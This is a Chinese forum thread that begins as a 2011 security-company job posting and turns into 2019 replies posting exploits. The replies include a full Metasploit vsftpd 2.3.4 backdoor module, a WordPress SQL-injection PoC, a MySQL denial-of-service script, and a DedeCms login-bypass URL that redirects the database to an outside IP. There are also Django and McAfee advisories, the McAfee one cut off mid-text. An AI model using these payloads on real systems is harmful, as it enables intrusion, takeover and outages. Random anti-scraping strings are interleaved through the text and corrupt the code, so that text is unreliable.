Board logo

标题: [人才招聘] [招聘] 启明星辰研发招聘 [打印本页]

作者: 小妍    时间: 2011-3-4 13:57     标题: 启明星辰研发招聘

站内发信给我就行了。
8 o8 `* D+ y- Y8 l3 \
2 d  f$ k# I" z4 \

一、研发中心:Linux C软件工程师(若干)

岗位职责:

1.
3 s. H' R4 b& H$ f' H安全网关,防火墙,IPS等嵌入式设备软件开发,维护

岗位要求:

1.
; P% i% p* r% ?: [% y3 C1 R精通C语言编程

2.: k1 Z# g, o& X  _# O) L
熟练使用Linux操作系统,精通 Linux下C语言编程

3.
! L" T0 w- s( j精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

4.
( S5 G! J1 {2 i熟悉网络安全协议及路由器、交换机、防火墙等安全设备

5.6 C2 A; V0 O" [
熟悉Linux内核及开发

二、研发中心:测试工程师(若干)

岗位职责:

1.2 H, D  o# Y* V5 {
负责产品的系统测试、集成测试工作

2.. m% }! `( a. j% W) K; b# x- C
负责产品用例的编写,执行、修改

3.
9 f" t# ]2 G# f, y8 `( n* t$ f负责产品性能的测试

4.
2 z( k/ b; x- M# e5 |$ D  n0 j( ]负责对外项目的支持和测试工作

岗位要求:

1.
2 }* u1 T. n) ~+ }" Y  N掌握基本的tcp/ip知识

2.4 S8 A. l+ m& n5 e. \
数通基础好

3.
# D) H2 R$ ?8 b! B7 N对linux有一定的基础

4.5 ^" J! G( E4 c/ e% ~0 M
掌握数据库的搭建和使用

5.
0 {* n1 y# _, U6 H: s* x5 Y, t) _至少熟悉一种编程语言C/Perl/VBS/TCL

6.
  T- \& g$ j7 R/ G. Q熟悉测试用例设计,熟悉系统测试,熟悉压力测试

7.
6 u" E' l6 b0 c- _8 N熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

8.
, g' h7 H; @# h( m对网络安全设备在网络中的部署有一定的认识

9.
. D  c6 c! Z5 c% z掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

三、研发中心:安全事件工程师(若干)

岗位职责:              

1.! p3 n+ F2 n  y; V) w
木&马检测服务、WEB漏洞扫描服务的实施

2.8 d: x( e$ z5 H7 g" O( X: ]
对服务客户的技术支持

3.
( x- E6 V: U7 C1 w# R
对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

4.. T$ f5 ^0 E# Q/ M5 C* N! Z
对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

5.
" q, X$ s1 E# s% a; n, J3 m; Y& F
对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究


作者: hushui8878    时间: 2019-5-27 12:02

VSFTPD v2.3.4 Backdoor 命令执行漏洞
################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################4 E! f1 ~  v' c- ?6 s
: X8 n3 ^7 L3 H% ^' T* c0 d" O
4 e* {7 `! |. P3 E8 i( E  H

  L, w% v. N% x% l% Hrequire msf/core) \6 a  `- V; C0 [6 H  Q
9 m- \8 S- E6 [
class Metasploit3 < Msf::Exploit::Remote
. f% g3 d) }7 C) @, IRank = ExcellentRanking! P2 l2 T9 E* o* ?3 [/ V( Y  v

2 U  C% V0 _; h/ Z& e+ B8 X$ ainclude Msf::Exploit::Remote::Tcp
" t% G0 |. c$ X. k# ?* [. Z: F
5 B" M5 B! g- A3 a2 a) pdef initialize(info = {})8 ^. s. |# ~! M" C  ^: O
super(update_info(info6 }% L: K( T. _% W* c3 j) }
Name => VSFTPD v2.3.4 Backdoor Command Execution1 C8 k* V. n: m) W8 R1 D8 s/ U7 ]
Descript_ion => %q{4 y8 |, n! u; Q
This module exploits a malicious backdoor that was added to the VSFTPD download
% Y( w6 [. _5 o1 w& F) Garchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between* J: I  z  y7 o3 I
June 30th 2011 and July 1st 2011 according to the most recent information8 ]) M0 t7 u) }- q6 t( W
available. This backdoor was removed on July 3rd 2011.6 O& U5 l( ~# ]1 q1 I  U* [/ M
}
; k* W6 m! a: k7 X# @! ]  D# NAuthor => [ hdm mc ]
% ~4 F' i- r/ ~1 _$ \License => MSF_LICENSE; P# k% ~  N; W( o9 W' w% c% l
Version => $Revision: 13099 $
9 E/ T  j( j0 M9 J/ jReferences =>
5 _$ ^( m" |$ B: W( b[
" D4 I5 h  ~/ U1 F- l  N[ URL http://pastebin.com/AetT9sS5]
7 K* L9 ^. T9 \7 K+ L7 q* H[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
  r% y) ~& j) {7 M/ V, Y]
! w) E! p. s$ Y2 h' o: ?" zPrivileged => true
4 L' S" L8 n: |4 A' n" NPlatform => [ unix ]3 t9 F' W+ M( C
Arch => ARCH_CMD" W6 ~- L: E" \0 C
Payload =>. _/ n/ x" s- N2 V6 [0 i; k
{0 H$ }# V* e, l/ T% g7 Z1 y
Space => 2000
3 I9 f. ^+ p/ A; f7 oBadChars =>
2 W9 X; g& o$ g+ o3 rDisableNops => true
  q7 V3 O( e# ?$ aCompat =>
, F) W! H' H7 O$ a9 ]{
) j$ g; C; g; E9 T. w7 APayloadType => cmd_interact
0 U9 c* M% i4 N6 Q/ mConnectionType => find) E5 R/ g3 u$ f$ [$ y. _
}
5 E/ G% o* F+ n) [}# J$ U/ t. A0 \. Y7 ~4 l
Targets =>
; r; w$ X. O3 Z' n" p  o[
3 ]* s- O5 @* W! i1 s[ Automatic { } ]
2 |9 k1 X& R& B]
7 \' v2 K8 w& z, m, jDisclosureDate => Jul 3 2011& T3 H8 j0 C4 F" Q
DefaultTarget => 0))/ C3 A* \% \( g; V
8 Z* G( B- E- K$ ^% z9 c
register_options([ Opt::RPORT(21) ] self.class)5 C+ A, Y  q8 w# l. c6 x) t7 l
end8 s# g7 u% w* o$ c( \$ x
$ h9 K3 ?7 M$ f6 i/ }
def exploit
5 R7 b1 G$ \5 Q8 ?
5 k0 _  l- ~2 n# T: E2 J0 unsock = self.connect(false {RPORT => 6200}) rescue nil
6 R7 w; U9 B4 ]+ I/ J% ?1 q& p0 W/ \  pif nsock
2 x8 N. X2 W9 v. c3 f. rprint_status(The port used by the backdoor bind listener is already open)
0 C2 U5 ^$ |; o6 f: Hhandle_backdoor(nsock)
1 }: c3 z- q$ i' N# Q- p  |' V4 sreturn$ @9 y( f6 \8 p: A
end) s/ ^% F: {" k! t
, c4 Y6 K4 F% y& I4 G
# Connect to the FTP service port first# F2 w# G' L+ ^, e
connect
0 ?5 ]2 M' I) Q2 Q! q% f4 B9 n( f, [
banner = sock.get_once(-1 30).to_s) C4 g* X/ _0 D7 _3 A
print_status(Banner: #{banner.strip}): o  g$ O' j; z  }* D# c! c
2 }+ A3 s; t/ e) q
sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
) [! ^+ S( R, \8 N9 g) t)$ n: S" u# F2 t$ b
resp = sock.get_once(-1 30).to_s: m9 J3 A2 I2 z0 s" M' I
print_status(USER: #{resp.strip})
( z, ?1 }2 P3 I0 H: x
" }6 r- L" A& j( w0 G3 l$ \if resp =~ /^530 /) X  {; d& G+ E& ?7 d
print_error(This server is configured for anonymous only and the backdoor code cannot be reached)% i9 d( E4 g! t9 M  Z
disconnect( U, f* h3 r: x! c" i( J
return
& I4 X  P% Z3 Y* S. d! h( Z: aend
/ `4 Z& L! m8 j1 m  Y1 H8 w# @; Q% v
if resp !~ /^331 /0 ?7 S: c3 u. g7 T! I
print_error(This server did not respond as expected: #{resp.strip})' r1 Q6 b3 B# W* U; T
disconnect
+ h3 g, W0 G% a9 Jreturn3 D; ^# E' T: x5 G
end6 B& s% x, E9 ^, g3 R: {& q8 c' }

. Z, {8 V1 y# m! @' [sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}5 N0 x* H0 W! O$ H5 k6 f
)) I4 ]4 W! z0 Z" H! c) z2 k& `

+ R/ Q. J3 O% ~# Do not bother reading the response from password just try the backdoor
. F# |. M9 K' d7 D6 x" rnsock = self.connect(false {RPORT => 6200}) rescue nil  i6 d- ~6 @6 r- y2 _( F
if nsock0 r+ g& `4 W2 m: [& c2 d
print_good(Backdoor service has been spawned handling...)$ a, u8 I& y% t: T& x+ F
handle_backdoor(nsock)
" S# S3 {$ W7 w, d- y# ]$ @& O9 @return
+ P/ D( v/ N7 m% N6 y+ lend8 I: C; W1 ^3 x9 h6 @2 E+ N
* I! M5 j6 \1 l( h- ^0 O( _
disconnect
% D1 J2 U4 l& O0 w0 w5 d
$ _! I: ^3 I* P5 yend6 _' N5 P( }7 t
& y$ L* [2 ]# \
def handle_backdoor(s)8 a1 z& ]1 e9 b
8 e4 v/ ^3 a/ u7 H* y& E. [
s.put(id
2 E. }: _0 M+ b$ {9 p)
% x' l2 `; r: g: ]6 q" M1 S9 C" @5 ?4 L: X- _7 e
r = s.get_once(-1 5).to_s# p" E7 c5 L% t, ^5 J
if r !~ /uid=/. \) a1 c7 W( r, U9 a) D! m
print_error(The service on port 6200 does not appear to be a shell), k$ M, A2 M- f% ?
disconnect(s), E4 G3 \# L9 d
return$ J& `- }/ T- v7 e  W
end3 t$ r; m- D) C. J7 H

+ G( [8 b. f, t3 P4 U: ?7 Y" vprint_good(UID: #{r.strip})9 R) G3 l3 ~1 ]7 j; i5 N+ t

8 B* c4 |* w1 D7 v" G, Ps.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
8 \* ^1 }4 \; R3 z+ `& O$ H! `handler(s)" ?2 W8 q$ P, g0 d3 w8 p" S, Q; `! I
end
9 Q% O# N% C% A: Z$ [# J* X
7 |7 X1 c. N; c, G1 J3 E; p( G4 Pend复制代码' \3 p. ?& i" c  k8 k, p- n

. f/ c! k0 ^& l; g, k* h) T) l" A' Q7 J9 O
# l/ q- Z  J4 ?) _! O4 T+ z

% r- f/ X' G# E& ]8 j( x
0 @7 v! V5 _" {2 D9 X
7 s6 X8 u; |4 t. J8 b5 T' c4 i8 b5 t4 a
& [# |( W- X6 B" H$ U( B$ {# J
* c. n* O  M, h: [% s  D

& x" ]& j" L: g" W9 N' j, g% j! u& g" b( C7 J

. x& ~' ^! b- m9 \% D! a
' o8 w2 ?! v8 F) b' W6 f+ x( S3 i

8 C/ R% O7 O( R  a
* Q7 }# _# N. ?# r8 o2 \) m, E* U9 o, Z
' W7 |% p. C4 k* `% ^* k$ A
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: loye13    时间: 2019-5-29 23:01

WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
1. Description:
2 ?$ W9 ]$ ?/ ?: x# {  s9 L( Q  
0 _; S/ H; t7 E) ^& C3 |8 [3 F1 F     - A, U+ K& n$ A  v, q& ?6 C" D
  
/ E+ d$ X7 u7 _SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress$ ]4 W$ M! @. v9 t
allows an authenticated user to execute arbitrary SQL commands via the id
8 i" N0 H* ]3 eparameter to wp-admin/admin.php.
! ~, X- J; B/ \. i( @  
5 x! ^2 X5 w1 u/ p0 |   
/ W3 m6 }( I& j) p' p  
1 S) j! s) E- [6 L( `2 f2. Proof of Concept:6 r! R& Z: o: I  U
  3 v7 b- Z5 v0 E, G& g7 z% ^9 n
   / r/ H* d$ q$ n! |8 m
  / g" t1 e6 Z& e  _' k) V) w. B' c
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id$ p4 `6 \. w" F2 R+ q- X. s3 r
=1 AND SLEEP(10)3 O, p- R& s# H8 |! m

; c- `# d7 N. D, X6 d  
6 ]5 Q% o7 y- x: D, }0 Y# {! S   
7 M9 d! w7 Y. f- X$ w( d9 I8 `  
' R- g  R% f$ [" b" k4 x+ u3. Solution:
5 }& _% ?& {4 M5 Z4 a    |: y3 k7 N" W4 h  v
     
# {$ d' ]# r2 K4 p5 K* s  
0 h5 P6 u6 s' ]- dThe plugin has been removed from WordPress. Deactivate the plug-in and wait9 f7 S/ ?) a" N
for a hotfix.
% w) a3 H) o; U  S; V5 ~8 A  
5 Q; a- p( P( \3 H* Y   
4 G- W7 \" J' g$ t0 P. i: E  ) a' ]6 m, M) I+ q, c' M% ^
4. Reference:
: f# ]; O( ]" X. A  
' d; l- d& D" R   
( @2 n" h5 G/ z( i" _  
8 G5 J6 o- y# y* Whttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
1 j' |! A1 f) |ction-sqli/
9 S( [) \3 `  P4 i! W7 H! c  f  
; ^# P! h7 O0 R- e! C( I' r0 {6 t  ohttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429! n3 {/ u. E" ?5 U  s, F  D9 @  X

5 i) c: f! c, r# q, i  I0 k% J' _  I# j) ]# h, U8 p

+ ~, ?2 t8 {4 J$ L' Y0 e, E# C2 B( f7 k
& `: d& q6 E, K: ~
) y& r: S+ ?4 R+ ~- w) j

$ m" A. C8 k$ F
7 D1 L; n$ F" c" \8 K$ J2 k5 a/ n6 j* Y" n" s& R  z
4 U) W; @3 J! r# Z
9 [' \# u1 p* u* n% G- A$ d* R

, i- j& M3 Q5 y9 d7 K
- V8 M8 @5 W9 S
. c- Z. v8 Q* }' l2 F2 b8 o) b' A4 S8 @1 {5 C' D
$ U7 k, _, `+ l3 J

, e# h, Q% O: R5 O( F, t* ?( G7 M- X' p8 W& z; H
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: dg86760517    时间: 2019-6-17 23:01

MySQL 5.5.8 远程拒绝服务漏洞
import socket, sys% B7 ~) C. x  h5 Q6 g+ e

0 e9 W5 |' f. D8 q* U% oprint "9 b2 T$ t3 U) L6 s7 K+ }/ @/ |/ g$ L! ~
"
& D: F' z- e" S  lprint "----------------------------------------------------------------"8 t0 ?# X1 r6 w7 e
print "| MySQL 5.5.8 Null Ptr (windows)                                |"* c1 c4 g" l" E9 b! R& {8 o/ M
print "| Level Smash the Stack                                         |"9 o( L- o3 n$ Y- _. s8 o2 C& b
print "----------------------------------------------------------------"
" Y+ E& q+ M8 r/ W" W9 Gprint "8 g; u) f; c9 [9 t
"/ @( y; m+ n6 \9 _
' M; K$ w, z0 j1 A' k1 m- |# o
buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"8 b7 V# p1 V1 M" d& g
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
+ u; b( J+ O# `$ i
- r( z. n, C7 Wbuf2=("x11x00x00x00x03set autocommit30")& l1 T; H: c) k" a( r& H. U

5 M: H  H% ?/ {; \' K! H7 d' zdef usage():
8 o* y. O! V( w5 L* V3 }4 p" u, tprint "usage : ./mysql.py <victim_ip>"
1 `- _$ S: v: Q9 ~/ qprint "example: ./mysql.py 192.168.1.22"1 H. Y. N- Z, c1 Q

5 `8 }7 Z7 D6 E2 Z% U
2 S8 x' o1 V( k$ n: cdef main():
& ]* p+ d8 O) Q1 o" G/ o0 Tif len(sys.argv) != 2:! n- S* l2 m% L. y; p
usage()
$ B& M- {. i2 X/ _8 \3 ]# [sys.exit()) l( a9 X4 m; G  S. G9 T/ Q
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)8 G  s& _0 `/ G% J- O
% R% F( O; W7 F$ @; T8 V6 J, n
HOST = sys.argv[1]& S, p3 `1 d' r; V9 J
PORT = int(3306)3 ]. F5 s$ J1 E  }
s.connect((HOST,PORT))
+ f# p1 M3 K) z. Uprint "
  • Connect") b/ i7 c0 V- B4 p
    s.send(buf)
    9 I6 m; X) R- rprint "
  • Payload 1 sent"8 q0 d( _- J" I1 C' I1 ]7 w' C3 }
    s.send(buf2)! j9 y2 Q+ |  @/ h9 Y
    print "
  • Payload 2 sent3 V' `* J9 h7 u2 s5 F# O
    ", "
  • Run again to ensure it is down.., @1 @/ u  n3 O$ C; G/ d6 U; C9 O
    "
    4 Y3 r( q$ p& [( v2 F! N& ts.close()4 w# b! Y; z: n; I1 f$ w1 u9 r

    0 V, A# n1 L6 y, nif __name__ == "__main__":$ r$ G% h4 ]3 Z& _& q: Z0 R" t& K: }" s( z
    main()' R' y! \9 z% C8 S$ L9 ]- \

    ! r2 H* ]( ~- N9 p( [- T- @$ ~# H8 h- ^* n* B8 D9 }

    3 w$ L8 d5 K9 c: h& \8 p6 @  {* @7 ~, w, c

    3 ~$ C! f* @/ ?4 F1 P
    9 H% p2 K8 ~0 G# F; s  Z5 j& J- r, {- B$ @' U, V' g
    ( b. ?% F$ w5 g  q. T

    . q1 y7 L& a* J* t+ w3 J7 a6 M  z/ ]" a7 e7 }
    5 K& D0 [9 J+ r# b: d) ]& O: J
    8 G* H: e6 s& T

      c9 g! a8 a" p5 S: J* y4 h4 n5 Y8 W. {- X

    5 C$ a3 P) D; G3 ~# W& S; N/ b6 W- {% s) o- G5 S# [
    0 P7 m& c, t! H  o+ `' {9 c
    " r- \5 M. H7 W
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 二级菜鸟    时间: 2019-6-20 23:57

    手把手教你装Linux系统-设置虚拟机

    8 |* S3 v" [5 qhttp://www.sitedir.com.cn/video/4.swf
    ' |- t+ f& x2 n' W4 D5 _' e" N& _) n: S

    $ Z8 f3 D( o; r5 T2 I9 h7 Q! r* L
    2 ]+ N+ f2 g  N; j3 {* K# j7 Q1 l! ]8 C; O+ s# c1 @7 \

    ' v+ E; K( w8 H+ {& Q- I1 N* N
    4 v3 [  V1 o2 i( r& d. s5 b1 _9 ?* v1 s1 l0 z
    8 N: |, V9 @  M# B
    ; u7 Q( `" n: o. R& B3 N( z

    " G- q3 o8 m% T2 S; M  a' Q) z, F+ c! k4 r. [
    $ o. f6 J. d( `: C- f# Z

    ; R5 g) o, b2 I% h* l6 k8 a; u# \3 z" E" T& ~4 y

    # t# q: K2 S' k1 A# G; W
    & C, S( l& k! `  v3 u
      p* a. n5 O% y# l& T
    ! Q6 ?7 q9 ?# i  v公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: arja    时间: 2019-10-12 23:20

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    : _6 \7 S- o3 J2 j. c
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    - ~* h! k/ h4 p
    此漏洞的前提是必须得到后台路径才能实现
    2 l# R& Q  T" _4 z
    官方临时解决办法:
    4 K9 [! V) D/ }; |8 z4 |- k5 d/ L
    找到include/common.inc.php文件,把:
    ' y" K4 {" Q5 ^
        foreach($_REQUEST as $_k=>$_v)
    & S+ ?$ J7 L5 |  e# f    {
    ! K+ e; ]7 `7 U/ A3 {        var_dump($_k);' g* X( O5 E- ~9 \) h
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )+ }: g7 a1 Z8 C) q5 |6 z9 }, A
            {) P* Z: Z$ f% K* H9 n- {
                exit('Request var not allow!');  {( T% e! A2 z$ T6 X6 a
            }
    & d5 H: e+ ?! l& N    }

    / Q) r2 E% C' m8 _2 f' c% W
    换成:

    + v8 j4 o8 x+ {/ s. p0 |4 G) a
        //检查和注册外部提交的变量
    ! D" H. x2 O- p0 _    function CheckRequest(&amp;$val) {
    8 h7 @+ s. [6 G) U        if (is_array($val)) {- w9 A- k8 ^/ a' x* V- x
                foreach ($val as $_k=>$_v) {( Z; k- [8 i8 w6 Z" @) q/ ?
                    CheckRequest($_k);
    ' a# D4 c5 x* X                CheckRequest($val[$_k]);
    ( ~& y) r% j& `. x3 M9 E            }' ?) k3 x4 n$ F# ], s& I+ Y8 E
            } else
    " x8 a; I4 a4 `5 @7 [% u        {: q- {8 B/ J2 D6 h+ v2 m" u
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )
    & t0 O# ~* [& B& K+ t            {
    8 T- r5 m7 K( U7 V3 E                exit('Request var not allow!');
    1 A: X. k# O  a" n% ~' Y            }$ z# `9 `6 L  k' ^  N& J
            }7 g# Q! s) @5 ~( S
        }7 a+ E6 g# v6 C6 X2 \% Y( v/ W$ b
        CheckRequest($_REQUEST);7 o% G5 r. v( A

    ( ~. E9 T# O$ A2 r( m. `) {* E/ G7 B, P  j
    4 v$ T/ @; r; R- j/ V
    5 q- Y6 }' V' u) T6 P( ~

    & g+ }% g1 |3 @+ a
    ! h7 t8 i6 M) j$ A5 d. @( }1 G8 C3 y! g7 T2 w  C, f. ?1 p- k, E
    2 c1 T2 K- s, r  U1 j& g) {

    0 O1 Q( D' S8 A1 i$ x& x1 D" h6 ?" I& i/ K9 J/ K! C6 q
    " M5 q5 x: C+ X

    9 B9 s4 e% C; I: C' {: W
    , i8 E9 r6 K. H
    ; a* D) R/ a! a/ t6 L" F! L0 \8 m8 y5 [

    . s: J: ]' u% b/ ]$ o& O5 D0 R. t" p8 O; G1 S" D1 h

      Z; ~" O, k8 V9 f' [  C$ A& @% G
    5 k, N  B9 N+ F1 n8 p* H公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 若凋零子爵    时间: 2019-10-14 23:55

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>6 o  M7 A, U. [/ }$ I

    4 ]; G+ g6 M# ~' B6 Khttp://www.sitedir.com.cn/video/8.swf[/quote]9 w  k/ Q8 R1 X  N" `. y, d
    7 ?' D) U: n9 J9 p- X: p" N6 {
    7 o+ n+ i* V) ]7 w, c9 B3 t! {
    6 d+ D+ ^* ?) b7 H! X1 N

    , S+ O8 S9 W' h" z' M) J
    % {/ I; o8 J( R- D. V
    ( s# z6 j! C1 W! }) e) d( W' o+ Q2 K) ]5 h# w' S; q' w  I
    * C0 n( R, m; l- V- F
    % H5 u9 s: R# L
    5 ^: o0 [0 f& L. |
    9 _" U+ M1 x- o! K: @
    0 B: j) f8 {0 I
    ; M; n! g# I0 ], b7 ~
    ' d) d( C# h9 N  p# r
    * G: H1 p/ T. m( }; T1 U! H
    4 Y8 l0 z: a) L( a; i

    , }8 D) v! t: F3 B4 n* o+ X, b
    % g" s0 l, o, ~% k公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 奶妈    时间: 2019-10-24 23:20

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12
    4 h4 u) _* z$ C0 {0 E( x' V
    影响版本:
    - |9 h/ `% E& _. ^! qDjango 1.2.53 h- D9 K; |6 l: Y2 Q' c  l" b
    Django 1.3 beta 13 W3 F# Z* \3 Q- X' ^- e! r
    Django 1.2.4  }& j$ `- u# Q  X$ |$ T
    Django 1.2.2
    $ }! j% B$ ?, z2 P: B( TDjango 1.2
    ' d6 h( K% I5 y9 ~
    漏洞描述:
    0 B4 c; U, d! B0 @. S, ~- a
    Django是一款开放源代码的Web应用框架,由Python写成。8 a* o% b8 B5 r) ?* L
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。. [7 ^6 d  D- U# O5 W* R. ~& C
    1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    0 f2 S+ r* i7 n9 t2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。/ h. ^7 l' I9 w% J6 O) u0 {/ ~
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    . x  [- U( P- M1 m' V0 q" V4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    ( J, |2 @. p- p2 a/ m) U# w
    细节参考:
    ' U4 Z! P$ P4 n' |, O9 Mhttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/& U6 E0 `8 k+ S' u- Q- X+ H
    http://secunia.com/advisories/45939/
    7 |. ?2 }- Y0 V9 g3 V+ R/ G

    * B# O' g* l$ S& p
    , ~* w! ~) j" l" P' u! K+ H# V6 K) C3 k" m" \& O
    # j) O/ |9 i6 q) I; M

    6 c, [7 B3 |9 t' \5 K- ]  Q3 p$ |: ]$ w0 b! d8 i1 I4 Q: x
    5 S) Q/ ]% _2 v7 _& m( G
    " G4 d8 L$ ]5 S( N, e  }
    3 ~7 D5 N; r- r$ ]. }$ @

    9 q! y! ?, {; ~" V0 q: |
    # S, r* X# V  [  N2 d7 \- ?. c) l7 F/ R/ @# a; e- `

    8 B  g; }( _9 @1 u2 V' z  w) j0 d2 p' P# @; y5 P1 E! S- c
    # S4 Q1 M4 V+ b" @
    $ |; c* X2 n8 U" z7 ?. q

    # M9 P7 {: C% h7 w* J* U+ _
    $ @- m% {; }; G2 k- m* V3 Y% J. ^& ~0 r: G3 c$ d( i" P
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 奶妈    时间: 2019-10-29 23:55

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    ' A( }: ?+ _& a6 T* [1 L$ W  c" ^影响版本: McAfee LinuxShield <= 1.5.1; W# }! t& N+ r& s, g2 }( S" m
    远程攻击: Yes 5 b' w! E8 s, {/ Z; Q+ _
    本地溢出: Yes
    4 x$ v! t- K  i9 D( s" I背景阅读:7 t; e0 o6 p& c* h0 }2 q
    ===========% j9 |4 o7 E6 N: M0 G

    * Q. ]/ q  a, r3 j1 T5 K: u' X) ~. FLinuxShield detects and removes viruses and other potentially unwanted
    $ u+ e% ?. s$ o$ X3 F" E, E' isoftware on Linux-based systems. LinuxShield uses the powerful McAfee
    9 ]8 Q% u' Q  V1 ?scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our, j6 }: Z, p' @! L& \& ~
    anti-virus products.) Z- `4 D% y( y7 w# V9 D
    5 o" q: Z. e% g  t1 f7 _
    Although a few years ago, the Linux operating system was considered a
    + B1 J9 r  v- T. [1 Msecure environment, it is now seeing more occurrences of software
    - S* V5 F: Z9 F7 V$ Y3 Qspecifically written to attack or exploit security weaknesses in! c+ l# m; |7 n9 L' z7 q* r4 d
    Linux-based systems. Increasingly, Linux-based systems interact with
    ( x8 B' Z6 `) g2 H$ BWindows-based computers. Although viruses written to attack Windows-
    ; x+ k% h; N/ }4 O1 C' mbased systems do not directly attack Linux systems, a Linux server1 r9 k5 s! R3 Q: h; u* ^
    can harbor these viruses, ready to infect any client that connects to
    . k, C3 D- T2 j4 [" zit.
    ; i. p/ Q) m, A0 w. e3 l
    & L! s/ }; N4 Z% e( `# AWhen installed on your Linux systems, LinuxShield provides protection. j' @- I* {" x( g/ I! N9 N0 f; C3 W
    against viruses, Trojan horses, and other types of potentially7 x; l" M5 V1 O, \/ u" A! l( l
    unwanted software.# O6 r- Y) N( f, P; F; G
    3 f0 g/ K9 E5 H' d; e
    LinuxShield scans files as they are opened and closed
    1 [- }2 C4 K6 c# A( l?&amp;#65533;&amp;#65533; a technique5 i" o& ?! x8 Q/ C
    known as on-access scanning. LinuxShield also incorporates an
    $ Z# E% G8 R: q6 y% K9 ], ?on-demand scanner that enables you to scan any directory or file in
    3 y, P. B" R" W6 [your host at any time.! w3 }) t1 B$ J; E9 B$ j2 ~
    ! J* H/ j8 Z* h3 e' Y" \# a
    When kept up-to-date with the latest virus-definition (DAT) files,9 U  }/ x3 V: x0 Z
    LinuxShield is an important part of your network security. We
    # L: P3 w9 h; Irecommend that you set up an anti-virus security policy for your' A* W: S8 L, r& n6 I
    network, incorporating as many protective measures as possible.
    / [: Z, l- C2 V( D; l' o, U
    & G4 j4 h$ N, }5 V( q2 }* vLinuxShield uses a web-browser interface, and a large number of
    4 R9 ]$ \( M% c' DLinuxShield installations can be centrally controlled by ePolicy/ v& M) C4 y6 p, s5 i- T3 [
    Orchestrator.. U7 x! x- y, ~" g) h
    8 Y" {6 X/ P5 S$ N
    (Product description from LinuxShield Product Guide)' C* l; S2 L% y5 w) M

    , ~+ e% q8 H- _4 m0 D5 u4 n* r8 O% ]
    3 C9 w& Y( w# i' y2 K9 X* m% ]6 \- d% j! R' z4 p3 q. t. d
    Description:1 V, ?' K1 F+ S' }! I
    ============: L+ F( z' z5 J: @

    0 M8 V: M/ C7 U  N# S* z" l- MThis vulnerability allows remote attackers to execute arbitrary code# S# t+ v- u. {% ~/ d
    on vulnerable installations of McAfee LinuxShield. User interaction
    ( G6 N" f& B% y. s" J4 yis not required to exploit this vulnerability but an attacker must
    5 U& i6 N5 e. s5 I6 S. [  m; g3 Q- j5 Zbe authenticated.7 E. k) U2 b6 X2 B. f

    , ^: v8 k: n" P- [& `3 }! VThe LinuxShield Webinterface communicates with the localy installed
    , [3 |) W; X) ^3 {# q9 a"nailsd" daemon, which listens on port 65443/tcp, to do+ d9 O, o1 x: f) U, P  r! [' y9 U  H
    configuration! G% B& ]. F4 I/ p* F" V
    changes, query the configuration and execute tasks.) A) Z6 A* m4 ]% }  A9 ]
    8 [8 S  D0 Z$ \) ^, R( [
    Each user, which can login to the victim box, can also authenticate+ v% f+ d8 p; {0 L# o; d/ x* |
    it self to the "nailsd" and can do configuration changes and
